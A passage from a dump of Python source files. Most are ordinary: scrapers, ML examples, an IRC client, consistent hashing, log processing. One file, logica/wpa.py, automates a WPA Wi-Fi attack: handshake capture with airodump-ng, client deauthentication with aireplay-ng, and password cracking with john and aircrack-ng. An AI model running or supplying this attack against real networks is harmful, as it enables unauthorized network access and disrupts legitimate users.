listener to a variable\n params:\n - path: Path to the variable in the form of a list of node names\n - callback: Function to be called when variable is updated\n Callback must have the form: f(var, value, disp)\n \"\"\"\n path = params.get('path')\n # callback = params.get('callback')\n def callback(var, value, disp):\n print(\"Variable {} has been updated to {}\".format(var, disp))\n\n if path is None or callback is None:\n raise ValueError(\"Must specify path and callback in params\")\n\n variable = self.node_from_path(path)\n variable.addListener(callback)\n\n return True, \"Added listener to {}\".format(variable.name)\n\n\nif __name__ == '__main__':\n agent, runner = ocs_agent.init_ocs_agent('observatory.smurf')\n\n smurf = Smurf_Agent(agent)\n \n agent.register_task('init_hardware', smurf.init_hardware)\n agent.register_task('read_config', smurf.read_config)\n agent.register_task('set_variable', smurf.set_variable)\n agent.register_task('add_listener', smurf.add_listener)\n\n runner.run(agent, auto_reconnect=True)\n smurf.close()\n","sub_path":"agents/smurf/Smurf_Agent.py","file_name":"Smurf_Agent.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"256928925","text":"from selenium import webdriver\nfrom selenium.webdriver import Chrome, ChromeOptions\nimport time \nimport pandas as pd\nfrom datetime import datetime\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport threading\n\n\ndef find_table_target_word(th_elms,td_elms,target:str):\n for th_elm,td_elm in zip(th_elms,td_elms):\n if th_elm.text == target:\n return td_elm.text\n\n\n\ndef calc_total_pages_num(search_keyword):\n\n url = 'https://tenshoku.mynavi.jp/'\n\n driver = Chrome(ChromeDriverManager().install())\n driver.get(url)\n time.sleep(2)\n\n try:\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(5)\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(3)\n except:\n pass\n\n driver.find_element_by_class_name('topSearch__text').send_keys(search_keyword)\n driver.find_element_by_class_name('topSearch__button').click()\n\n num = int(driver.find_element_by_css_selector('body > div.wrapper > div:nth-child(5) > div.result > div > p.result__num > em').text)\n return -(-num//50)\n\n driver.quit()\n\n\n\ndef search(search_keyword,i):\n\n page_url = f'https://tenshoku.mynavi.jp/list/kw{search_keyword}/pg{i}/?jobsearchType=14&searchType=18'\n\n driver = Chrome(ChromeDriverManager().install())\n driver.get(page_url)\n time.sleep(2)\n\n try:\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(5)\n driver.execute_script('document.querySelector(\".karte-close\").click()')\n time.sleep(3)\n except:\n pass\n\n exp_name_list = []\n exp_copy_list = []\n exp_status_list = []\n exp_first_year_fee_list = []\n \n name_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .cassetteRecruit__name\")\n copy_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .cassetteRecruit__copy\")\n status_list = driver.find_elements_by_css_selector(\".cassetteRecruit__heading .labelEmploymentStatus\")\n table_list = driver.find_elements_by_css_selector(\".cassetteRecruit .tableCondition\") # テーブル全体を取得\n\n for name,copy,status,table in zip(name_list,copy_list,status_list,table_list):\n exp_name_list.append(name.text)\n exp_copy_list.append(copy.text)\n exp_status_list.append(status.text)\n\n first_year_fee = find_table_target_word(table.find_elements_by_tag_name(\"th\"),table.find_elements_by_tag_name(\"td\"), \"初年度年収\")\n exp_first_year_fee_list.append(first_year_fee)\n \n driver.quit()\n\n EXP_CSV_PATH = 'exp_list_{search_keyword}_{datetime}.csv'\n\n now = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n df = pd.DataFrame({\"企業名\":exp_name_list,\"キャッチコピー\":exp_copy_list,\"ステータス\":exp_status_list,\"初年度年収\":exp_first_year_fee_list})\n df.to_csv(EXP_CSV_PATH.format(search_keyword=search_keyword,datetime=now), encoding=\"utf-8-sig\")\n\n\n\n\nsearch_keyword = 'プログラマー'\n\ntotal_pages_num = calc_total_pages_num(search_keyword)\n\nt_list = []\nfor i in range(1,total_pages_num+1):\n t = threading.Thread(target=search, args=[search_keyword, i])\n t_list.append(t)\n\nfor t in t_list:\n t.start()\n \nfor t in t_list:\n t.join()","sub_path":"kadai8-submit3/kadai8-submit3.py","file_name":"kadai8-submit3.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117680554","text":"import os, sys\nimport subprocess\nimport time\nimport pandas as pd\nimport commands\nimport signal\n\n\nclass Wpa():\n\t\"\"\"docstring fos Wep\"\"\"\n\tdef __init__(self,red):\n\t\tself._red = red\n\n\tdef red(self):\n\t\treturn self._red\n\t\n\tdef atacar(self):\n\t\twlan = commands.getoutput('sudo airmon-ng check kill')\n\t\tcomando = 'sudo airmon-ng start wlan1 '+self.red().channel()\n\t\twlan = commands.getoutput(comando)\n\t\tnom = self.red().bssid()\n\t\tnom = nom.replace(\" \",\"_\")\n\t\tarchivo = './datos/'+nom+'/'+nom\n\t\tprint('Empezando la busqueda de handshakes')\n\t\tcomando ='sudo airodump-ng --bssid '+str(self.red().essid())+' --channel '+str(self.red().channel())+' --write '+archivo+' wlan1mon'\n\t\tairodump = subprocess.Popen(comando,shell=True,preexec_fn=os.setsid)\n\t\ttime.sleep(2)\n\t\tprint('lanzando la desautenticacion')\n\t\tcomando = 'sudo aireplay-ng -0 15 -a '+self.red().essid()+' wlan1mon'\n\t\taireplay = subprocess.Popen([comando],stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True,preexec_fn=os.setsid)\n\t\taireplay.wait()\n\t\tprint('Capturando handshake')\n\t\ttime.sleep(120)\n\t\tairodump.terminate()\n\t\tairodump.kill()\n\t\tos.killpg(os.getpgid(airodump.pid),signal.SIGTERM)\n\t\tcomando = 'sudo john --incremental:Digits --stdout | aircrack-ng -b '+self.red().essid()+' '+archivo+'-01.cap'+' -w - > '+archivo+'contrasena'\n\t\tprint(comando)\n\t\tprint('Descifrando la contrasena')\n\t\tresult = subprocess.Popen(comando,shell=True,preexec_fn=os.setsid)\n\t\ttime.sleep(60)\n\t\tresult.terminate()\n\t\tresult.kill()\n\t\tos.killpg(os.getpgid(result.pid),signal.SIGTERM)\n\t\tcomando = 'cat '+archivo+'contrasena |grep \"KEY FOUND\"'\n\t\tsalida = commands.getoutput(comando)\n\t\tsalida = str(salida)\n\t\tprint(salida)\n\t\tif salida != '':\n\t\t\tself.red().set_contrasena(salida)\n\t\telse:\n\t\t\tprint('Caduco el tiempo del ataque, la contrasena no pudo ser descifrada')\n\t\t\tself.red().set_contrasena('El tiempo del ataque ha caducado y no se pudo recuperar la contrasena')\t\n\t\tself.habilitarWlan()\n\n\n\tdef habilitarWlan(self):\n\t\twlan = commands.getoutput('sudo airmon-ng stop wlan1mon')\n\t\twlan = commands.getoutput('sudo ifconfig wlan1 up')","sub_path":"logica/wpa.py","file_name":"wpa.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352422710","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport sys\n\n\ndef test_i(i):\n filename = os.path.join(sys.argv[2], '%02d.txt' % i)\n result = subprocess.run([sys.argv[1], filename],\n stdout=subprocess.PIPE)\n expected_filename = os.path.join(sys.argv[2], '%02d-expected.txt' % i)\n with open(expected_filename, 'r') as expected_file:\n expected = expected_file.read()\n if expected != result.stdout.decode():\n print('FAIL: i = %02d' % i)\n print('expected:')\n print(expected)\n print('actual:')\n print(result.stdout.decode())\n sys.exit(1)\n\n\n# usage: ./e2e_test.py tbs_main ex_dir\ndef main():\n test_i(1)\n i = 2\n while os.path.isfile(os.path.join(sys.argv[2], '%02d.txt' % i)):\n test_i(i)\n i += 1\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex/e2e_test.py","file_name":"e2e_test.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"436307803","text":"import numpy\r\n\r\ndef normalize_v3(arr):\r\n ''' Normalize a numpy array of 3 component vectors shape=(n,3) '''\r\n lens = numpy.sqrt( arr[:,0]**2 + arr[:,1]**2 + arr[:,2]**2 )\r\n arr[:,0] /= lens\r\n arr[:,1] /= lens\r\n arr[:,2] /= lens\r\n return arr\r\n\r\n\r\ndef Get_Normal(vertices,faces):\r\n N = []\r\n for face in range(len(faces)):\r\n c_face = faces[face]\r\n v_1 = int(c_face[0,0]) - 1\r\n v_2 = int(c_face[0,1]) - 1\r\n v_3 = int(c_face[0,2]) - 1\r\n v_1 = vertices[v_1]\r\n v_2 = vertices[v_2]\r\n v_3 = vertices[v_3]\r\n n = numpy.cross(v_1-v_3 , v_2-v_3 )\r\n n = normalize_v3(n)\r\n N.append(n)\r\n return N\r\n","sub_path":"src/normals.py","file_name":"normals.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611642860","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport os\nimport math\nimport re\nimport gzip\nimport glob\nimport os.path\nimport shutil\nimport fnmatch\nimport zipfile\nfrom os import walk\n\n\n#Localiza se a data do trace pertence ao intervalo desejado\ndef EncontraData(dataNova, dicionarioData):\n for data in dicionarioData:\n if (data == dataNova):\n return True\n return False\n\n#Define dicionário de dispositivos móveis e não móveis\ndef defineDicionarios(dicionarioMobile):\n ArquivoMobile = open('Mobile.txt', 'r');\n for linha in ArquivoMobile:\n dicionarioMobile.append(linha.strip())\n return dicionarioMobile\n\n#Escreve matriz em arquivo\ndef EscreveArquivo(registros,numArquivo):\n for registro in registros:\n try:\n with open(\"Impeachment_\"+str(numArquivo)+\".txt\", \"a\") as arquivo:\n arquivo.write(str(registro)+\"\\n\")\n except: \n EscreveLogErro(\"Erro escrita em disco\")\n\n#Escreve log em arquivo\ndef EscreveLog(mensagem):\n try:\n with open(\"Log.txt\", \"a\") as arquivo:\n arquivo.write(str(mensagem)+\"\\n\")\n except: \n EscreveLogErro(\"Erro no log\")\n\n#Escreve log de erro em arquivo\ndef EscreveLogErro(mensagem):\n try:\n with open(\"LogErro.txt\", \"a\") as arquivo:\n arquivo.write(str(mensagem)+\"\\n\")\n except: \n print(\"Erro no log de erro\")\n\n\n#Localiza se um termo pertence ao dicionário Mobile\ndef EncontraMobile(linha,dicionarioMobile):\n achou = False\n try:\n for termo in dicionarioMobile:\n if (linha.find(termo) != -1):\n achou = True\n break\n except: \n EscreveLogErro(\"Erro na busca\")\n return achou\n\n#Localiza todos os arquivos com extensão gz no diretório origem descompacta em arquivo na pasta destino\ndef VarreDiretorio(caminho,dicionarioMobile, dicionarioData):\n numArquivo = 1\n for conteudo in glob.glob(os.path.join(caminho, '*')):\n if os.path.isdir(conteudo):\n contadores = VarreDiretorio(conteudo)\n if fnmatch.fnmatch(conteudo, '*.gz'):\n #Limpa nome do arquivo\n dataArquivo = conteudo.replace(\"nginx-fe_access-\",\"\")\n dataArquivo = dataArquivo.replace(\"nginx-fe_monitor-\",\"\")\n dataArquivo = dataArquivo.replace(\"nginx-fe_crypto_access-\",\"\")\n dataArquivo = dataArquivo.replace(caminho,\"\")\n dataArquivo = dataArquivo.replace(\"/\",\"\")\n dataArquivo = dataArquivo[:8]\n #Localiza se data está no intervalo definido\n achou = EncontraData(dataArquivo, dicionarioData)\n if(achou == True):\n registros = []\n EscreveLog(\"Inicio da leitura do arquivo \"+str(conteudo))\n base = os.path.basename(conteudo) \n with gzip.open(conteudo, 'rb') as infile:\n #Para cada linha do arquivo de entrada\n for linha in infile:\n try:\n #Transforma linha em vetor\n vetorLinha = linha.split()\n #Exclui todos as colunas antes da 20ª\n linhaLimpa = ' '.join(vetorLinha[20::])\n #Busca termos do dicionário Mobile na linha\n mobile = EncontraMobile(linhaLimpa,dicionarioMobile)\n if(mobile):\n #adicionar SESSÃO_6 USUÁRIO_0 REQUEST_TIME_9 TIME_STAMP_2 BODY_BYTES_11\n registros.append(str(vetorLinha[6]) + \" \" + str(vetorLinha[0]) + \" \" + str(vetorLinha[9]) + \" \" + str(vetorLinha[2]) + \" \" + str(vetorLinha[11]))\n except: \n EscreveLogErro(\"Erro leitura vetor linha\")\n #A cada arquivo salva em arquivo\n EscreveArquivo(registros, numArquivo)\n numArquivo = numArquivo +1\n EscreveLog(\"Fim da leitura do arquivo \"+str(conteudo)) \n\nclass Principal():\n EscreveLog(\"Inicío script\")\n dicionarioMobile = []\n dicionarioData = []\n dicionarioData.append(\"20160522\")\n\n #Coloca em memória os dicionários\n dicionarioMobile = defineDicionarios(dicionarioMobile)\n\n #Diretório com arquivos compactados\n caminhoOrigem = \"/media/servertrace/live/live\"\n #caminhoOrigem = \"/home/daniel/workplace/TracesCDN/Origem\"\n \n #Localiza traces \n VarreDiretorio(caminhoOrigem,dicionarioMobile, dicionarioData)\n\n #Finaliza Log\n EscreveLog(\"Fim do script\")\n \n \n\n\n","sub_path":"ScriptsArtigo01/Impeachment_2_senado.py","file_name":"Impeachment_2_senado.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400500862","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\nmnist = input_data.read_data_sets('MNIST_data/',one_hot=True)\n#定义网络\nin_units = 784\nh1_units = 300\nW1 = tf.Variable(tf.truncated_normal([in_units,h1_units],stddev=0.1)) #标准差是0.1\nb1 = tf.Variable(tf.zeros([1,h1_units]))\nW2 = tf.Variable(tf.zeros([h1_units,10]))\nb2 = tf.Variable(tf.zeros([1,10]))\n\nx = tf.placeholder(tf.float32,[None,in_units])\nkeep_prob = tf.placeholder(tf.float32)\nhidden1 = tf.nn.relu(tf.matmul(x,W1)+b1)\nhidden1_drop = tf.nn.dropout(hidden1,keep_prob)\ny = tf.nn.softmax(tf.matmul(hidden1_drop,W2)+b2)\n#定义损失函数和优化器\ny_ = tf.placeholder(tf.float32,[None,10])\ncost = -tf.reduce_sum(y_*tf.log(y),reduction_indices=[1])\ncross_entropy = tf.reduce_mean(cost)\ntrain = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)\n#训练\nsession = tf.Session()\ninit = tf.global_variables_initializer()\nsession.run(init)\nfor i in range(3000):\n batch_x,batch_y = mnist.train.next_batch(100)\n session.run(train,feed_dict={x:batch_x,y_:batch_y,keep_prob:0.75})\n#检验模型训练效果\nprediction = tf.equal(tf.argmax(y,1),tf.argmax(y_,1))#None*1\naccuracy = tf.reduce_mean(tf.cast(prediction,tf.float32))\nprint(session.run(accuracy,feed_dict={x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))\n\n\n\n","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620316387","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn as skl\nimport numpy as np\nimport seaborn as sns\nimport folium\ndef heartbar():\n path = \"heart.csv\"\n df = pd.read_csv(path)\n df = df.drop(columns=['Class', 'Topic', 'DataSource', 'Data_Value_Footnote_Symbol', 'Data_Value_Footnote', 'StratificationCategory1'])\n df = df.drop(columns=['Data_Value_Type', 'StratificationCategory2', 'TopicID', 'Georeference Column', 'Data_Value_Unit'])\n df = df.drop(columns=['LocationID', 'LocationDesc', 'States', 'Counties'])\n df.rename(columns={\"Stratification1\": \"Gender\", \"Stratification2\": \"Race\", \"Y_lat\": \"Y\", \"X_lon\": \"X\"}, inplace=True)\n print(df.head())\n df.sort_values(by = ['Data_Value'], ascending=False, axis=0, inplace=True)\n df_top25 = df.iloc[0:275,:]\n print(df_top25.head())\n plt.style.use('seaborn-pastel')\n plt.figure(figsize=(20, 3))\n plt.bar(df_top25['LocationAbbr'],df_top25['Data_Value'], color = 'red', width = 0.5)\n plt.title('Heart Disease Trends In Top 25 States')\n plt.ylabel('Heart Attacks per 100,000')\n plt.xlabel('State')\n plt.show()\nheartbar()","sub_path":"BarPlot.py","file_name":"BarPlot.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481215963","text":"\"\"\"Test py_modules\"\"\"\n\n\nimport log\nimport task\nimport worker\n\n\ndef test_repo():\n \"\"\"test\"\"\"\n bill = worker.Worker('Bill')\n john = worker.Worker('John')\n log_file = log.Log()\n fixed_task = task.Task('fixed')\n hourly_task = task.Task('hourly', time=2)\n log_file.confirm(bill, fixed_task)\n log_file.confirm(john, hourly_task)\n assert log_file.report() == \"\"\"Bill\\t$20\nJohn\\t$30\"\"\"\n","sub_path":"test_modules.py","file_name":"test_modules.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169510884","text":"'''\r\n【程序12】 题目:判断101-200之间有多少个素数,并输出所有素数。 \r\n1.程序分析:判断素数的方法:用一个数分别去除2到sqrt(这个数),如果能被整除, 则表明此数不是素数,反之是素数。 \r\n2.程序源代码:\r\n'''\r\nimport math\r\ndef isprimy(a):\r\n d=[]\r\n for b in a:\r\n for c in range(2,int(math.sqrt(b))+1):\r\n if b % c == 0:\r\n d.append(b)\r\n break\r\n return d\r\nb = []\r\nfor a in range(101,201):\r\n b.append(a)\r\nfor a in isprimy(b):\r\n b.remove(a)\r\nprint(b)\r\n","sub_path":"Test1/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126809179","text":"import turtle\nt = turtle.Turtle()\nscreen = turtle.Screen()\nscreen.bgcolor(\"lightyellow\")\nt.hideturtle()\nt.shape(\"turtle\")\nt.penup()\nt.goto(0,0)\nsteps = 20\n'''\n#Draws a circular spiral\nfor i in range(300):\n t.stamp()\n step = steps + 2\n t.penup()\n t.forward(steps)\n t.right(24)\n'''\n\n#draws a square spiral\nt.pendown()\nt.speed(0)\nfor i in range(1300):\n side = i% 4\n if side == 0:\n t.pencolor(\"red\")\n if side == 1:\n t.pencolor(\"green\")\n if side == 2:\n t.pencolor(\"yellow\")\n if side == 3:\n t.pencolor(\"blue\")\n t.fd(i)\n t.lt(90.5)\n","sub_path":"Python - Beginner/lesson 9 - youwen.py","file_name":"lesson 9 - youwen.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20160865","text":"# NAMES retrieving irc client, thanks to smackshow\n# from here - http://stackoverflow.com/questions/6671620/list-users-in-irc-channel-using-twisted-python-irc-framework\nfrom twisted.words.protocols import irc\nfrom twisted.internet import defer\n\n\nclass NamesIRCClient(irc.IRCClient):\n def __init__(self, *args, **kwargs):\n self._namescallback = {}\n\n def names(self, channel):\n channel = channel.lower()\n d = defer.Deferred()\n if channel not in self._namescallback:\n self._namescallback[channel] = ([], [])\n\n self._namescallback[channel][0].append(d)\n self.sendLine(\"NAMES %s\" % channel)\n return d\n\n def irc_RPL_NAMREPLY(self, prefix, params):\n channel = params[2].lower()\n nicklist = params[3].split(' ')\n\n if channel not in self._namescallback:\n return\n\n n = self._namescallback[channel][1]\n n += nicklist\n\n def irc_RPL_ENDOFNAMES(self, prefix, params):\n channel = params[1].lower()\n if channel not in self._namescallback:\n return\n\n callbacks, namelist = self._namescallback[channel]\n\n for cb in callbacks:\n cb.callback(namelist)\n\n del self._namescallback[channel]\n","sub_path":"names_bot.py","file_name":"names_bot.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"381080392","text":"import os\nimport sys\nimport json\nimport math\nimport threading\nfrom collections import defaultdict\nimport pandas as pd\n\nfrom unionFind import UnionFind\n\n\nTHRESHOLD = 0.6\nif len(sys.argv) > 1:\n THRESHOLD = float(sys.argv[1])\n\n\ndef date_intersect(start_a, end_a, start_b, end_b):\n if start_a > end_b or start_b > end_a:\n return None\n return sorted([start_a, end_a, start_b, end_b])[1:3]\n\n\n# Multi-thread speed up.\nclass MyThread(threading.Thread):\n threads = []\n lock = threading.Lock()\n sem = threading.Semaphore(200)\n user_cmt_data = None\n user_lst_data = None\n uf = None\n\n def __init__(self, cur_idx):\n threading.Thread.__init__(self)\n self.idx = cur_idx\n\n @staticmethod\n def run_tasks():\n for thread in MyThread.threads:\n MyThread.sem.acquire()\n thread.start()\n\n for thread in MyThread.threads:\n thread.join()\n\n @classmethod\n def set_uf(cls, uf):\n cls.uf = uf\n\n @classmethod\n def set_lst_data(cls, lst_data):\n cls.user_lst_data = lst_data\n\n @classmethod\n def set_cmt_data(cls, cmt_data):\n cls.user_cmt_data = cmt_data\n\n def run(self):\n cur_usr_a = MyThread.user_lst_data[self.idx]\n print(f\"Thread {self.idx} start.\")\n for j in range(self.idx + 1, len(MyThread.user_lst_data)):\n # print(f\"{j}\", end=\"\\t\")\n cur_usr_b = MyThread.user_lst_data[j]\n # Calculate similarity\n d_usr_a = MyThread.user_cmt_data[cur_usr_a]\n d_usr_b = MyThread.user_cmt_data[cur_usr_b]\n time_range = date_intersect(d_usr_a[\"s\"], d_usr_a[\"e\"], d_usr_b[\"s\"], d_usr_b[\"e\"])\n if not time_range:\n # pass this pair if there's no overlap between the dates\n continue\n duration = (time_range[1] - time_range[0]).days + 1\n accu = 0\n duration_none_empty = 0\n for k in range(duration):\n cur_date = time_range[0] + pd.Timedelta(k, unit=\"d\")\n cmt_pkgs_a = d_usr_a[\"data\"].get(cur_date, {})\n cmt_pkgs_b = d_usr_b[\"data\"].get(cur_date, {})\n # Calculate Jaccard's coefficient\n frac_a = 0\n frac_b = sum(cmt_pkgs_a.values()) + sum(cmt_pkgs_b.values())\n if not frac_b:\n continue\n for pkg in cmt_pkgs_a.keys():\n if pkg in cmt_pkgs_b.keys():\n frac_a += min(cmt_pkgs_a[pkg], cmt_pkgs_b[pkg])\n accu += frac_a / (frac_b - frac_a)\n duration_none_empty += 1\n similarity = accu / duration_none_empty\n if similarity > THRESHOLD:\n MyThread.lock.acquire()\n MyThread.uf.union(self.idx, j)\n MyThread.lock.release()\n print(f\"Thread {self.idx} finished.\")\n MyThread.sem.release()\n\n\nf = open(os.path.join(\"data\", \"test.dat\"), \"r\", encoding=\"utf-8\")\ndata = sorted([line[:-1].split(\"\\t\") for line in f], key=lambda x: x[3])\nf.close()\n\nprint(\"Initializing...\")\nuser_cmt_data = {}\nfor line in data:\n line[4] = pd.to_datetime(line[4])\n if line[3] not in user_cmt_data:\n user_cmt_data[line[3]] = {\n \"s\": None,\n \"e\": None,\n \"data\": {},\n \"cnt\": 0,\n }\n if not user_cmt_data[line[3]][\"s\"] or line[4] < user_cmt_data[line[3]][\"s\"]:\n user_cmt_data[line[3]][\"s\"] = line[4]\n if not user_cmt_data[line[3]][\"e\"] or line[4] > user_cmt_data[line[3]][\"e\"]:\n user_cmt_data[line[3]][\"e\"] = line[4]\n if line[4] not in user_cmt_data[line[3]][\"data\"]:\n user_cmt_data[line[3]][\"data\"][line[4]] = defaultdict(int)\n user_cmt_data[line[3]][\"data\"][line[4]][line[1]] += 1\n user_cmt_data[line[3]][\"cnt\"] += 1\n\ndel_list = []\nfor k, v in user_cmt_data.items():\n if v[\"cnt\"] < 2:\n del_list.append(k)\nprint(f\"Delete {len(del_list)} user(s) from {len(user_cmt_data)} users.\")\nfor k in del_list:\n del user_cmt_data[k]\n\nuser_lst = sorted(list(user_cmt_data.keys()))\nuf = UnionFind(len(user_lst))\n\nMyThread.set_cmt_data(user_cmt_data)\nMyThread.set_lst_data(user_lst)\nMyThread.set_uf(uf)\n\nfor i in range(len(user_lst) - 1):\n MyThread.threads.append(MyThread(i))\n\nMyThread.run_tasks()\n\nresult = defaultdict(list)\nfor idx, res in enumerate(uf.result()):\n result[res].append(user_lst[idx])\n\n# print(\"Writing result.\")\nif not os.path.exists(\"res\"):\n os.mkdir(\"res\")\n \nf = open(os.path.join(\"res\", f\"usr_cred_weight_res_{THRESHOLD}.json\"), \"w\", encoding=\"utf-8\")\njson.dump({group: {\n \"Group weight\": math.sqrt(len(mem)),\n \"Mem weight\": math.sqrt(len(mem))/len(mem)\n} for group, mem in result.items()}, f, indent=2)\nf.close()\n\nf = open(os.path.join(\"res\", f\"usr_cred_grouping_res_{THRESHOLD}.json\"), \"w\", encoding=\"utf-8\")\njson.dump({group: mem for group, mem in result.items()}, f, indent=2, ensure_ascii=False)\nf.close()\n\n# print(\"Done.\")\n","sub_path":"edwin_2019/scripts/user_cred.py","file_name":"user_cred.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452768411","text":"from bisect import bisect\r\nimport hashlib\r\nimport bisect\r\n\r\n\r\nclass ConsistentHash(object):\r\n # Величина 1го деления на 1 сервер с весом 1\r\n interleave_count = 40\r\n\r\n def __init__(self, objects=None):\r\n \"\"\"\r\n Объекты это сервера наши, могут быть в формате:\r\n [\"server_1\", ..., \"server_n\"]\r\n Или как словарь с весами для каждого сервера:\r\n {'server_1': 1,\r\n 'server_2': 2,\r\n 'server_n': 1}\r\n \"\"\"\r\n\r\n # Список сортированный с числами (хеши от серверов) распложеным на кольце\r\n self.keys = []\r\n # Словарь где для значения из key есть соответствующее имя сервера\r\n self.key_node = {}\r\n\r\n # Список серверов в строках\r\n self.nodes = []\r\n # Словарь с весами\r\n self.weights = {}\r\n # Кол-во серверов\r\n self.index = 0\r\n # Проинициализируем кольцо\r\n self.add_nodes(objects)\r\n\r\n def _ingest_objects(self, objects):\r\n if isinstance(objects, dict):\r\n self.nodes.extend(objects.keys())\r\n self.weights.update(objects.copy())\r\n elif isinstance(objects, list):\r\n self.nodes.extend(objects[:])\r\n\r\n def add_nodes(self, nodes):\r\n \"\"\"\r\n Добавим ноды в кольцо.\r\n - Если нам п��реданны объекты значит там формат [\"name\", weight]\r\n - Если передан лист то там [\"name\"] и у всех вес 1\r\n \"\"\"\r\n self._ingest_objects(nodes)\r\n\r\n # Сгенерируем кольцо с текущими серверами\r\n self._generate_ring(start=self.index)\r\n\r\n self.index = self.get_nodes_cnt()\r\n self.keys.sort()\r\n\r\n def _generate_ring(self, start=0):\r\n # Расположем сервера на \"кольце\"\r\n for node in self.nodes[start:]:\r\n for key in self._node_keys(node):\r\n # Занесем в словарь для каждых 4байт из 16\r\n # пару [вычисленное 32 разрядное значение ; имя ноды].\r\n self.key_node[key] = node\r\n # Добавим в список \"отметку\"/\"позицию\" сервера на кольце\r\n self.keys.append(key)\r\n\r\n def _node_keys(self, node):\r\n \"\"\"\r\n node это строка с именем сервера\r\n Добавим веса ноде если они заданны, иначе 1.\r\n \"\"\"\r\n if node in self.weights:\r\n weight = self.weights.get(node)\r\n else:\r\n weight = 1\r\n\r\n factor = self.interleave_count * weight\r\n\r\n for j in range(0, int(factor)):\r\n # Считаем хеш\r\n b_key = self._hash_digest('%s-%s' % (node, j))\r\n # Вернем генератор, откусывая по 4 байта (32 разрядное число) от 16 байтов хеша\r\n for i in range(4):\r\n yield self._hash_val(b_key, lambda x: x + i * 4)\r\n\r\n def get_node(self, string_key):\r\n \"\"\"\r\n По заданному ключу возвращается соответствующий узел в хеш-кольце.\r\n Если кольцо пустое то None.\r\n\r\n \"\"\"\r\n\r\n # pos - Это идентификатор ноды на кольце\r\n pos = self.get_node_pos(string_key)\r\n if pos is None:\r\n return None\r\n # Вернём имя сервера соответствующее keys[pos]. Где keys[pos] это хеш от сервера (4 байта).\r\n return self.key_node[self.keys[pos]]\r\n\r\n def get_node_pos(self, string_key):\r\n \"\"\"\r\n Ищем соответсвующую ноду.\r\n Если хеш-кольцо пусто, возвращается 0 .\r\n \"\"\"\r\n if not self.key_node:\r\n return None\r\n # key - место на кольце для ключа-строки\r\n key = self.gen_key(string_key)\r\n\r\n nodes = self.keys\r\n # Поиск места для \"вставки\" элемента в отсортированный список, таким образом, чтобы key располагался как можно правее\r\n pos = bisect.bisect(nodes, key)\r\n if pos == len(nodes):\r\n return 0\r\n else:\r\n return pos\r\n\r\n def get_nodes_cnt(self):\r\n return len(self.nodes)\r\n\r\n def gen_key(self, key):\r\n \"\"\"\r\n Рассчитаем место на хеш-кольце для ключа.\r\n Так же как для сервера но откусывая только первые 4 байта.\r\n \"\"\"\r\n b_key = self._hash_digest(key)\r\n return self._hash_val(b_key, lambda x: x)\r\n\r\n def _hash_val(self, b_key, entry_fn):\r\n \"\"\"\r\n Так как кольцо от 0 до 2^32\r\n Вычислим 32 разрядное число объединив 4 байта из хеша\r\n \"\"\"\r\n return ((b_key[entry_fn(3)] << 24)\r\n | (b_key[entry_fn(2)] << 16)\r\n | (b_key[entry_fn(1)] << 8)\r\n | b_key[entry_fn(0)])\r\n\r\n def _hash_digest(self, key):\r\n # Так как ключ у нас строка то encode\r\n key = key.encode()\r\n\r\n m = hashlib.md5()\r\n m.update(key)\r\n\r\n # Получим зашифрованную последовательность байтов преобразуя char_to_int\r\n res = [x if isinstance(x, int) else ord(x)\r\n for x in m.digest()]\r\n\r\n return res\r\n","sub_path":"lesson_9/Consistent_hashing.py","file_name":"Consistent_hashing.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"322931731","text":"for _ in range(int(input())):\n N,K,x,y=map(int,input().split())\n if (x,y)==(N,N) or (x,y)==(N,0) or (x,y)==(0,N) :\n print(x,y)\n elif x==y:\n print(N,N)\n else:\n if x>y:\n va=N-x\n FCx,FCy=x+va,y+va\n 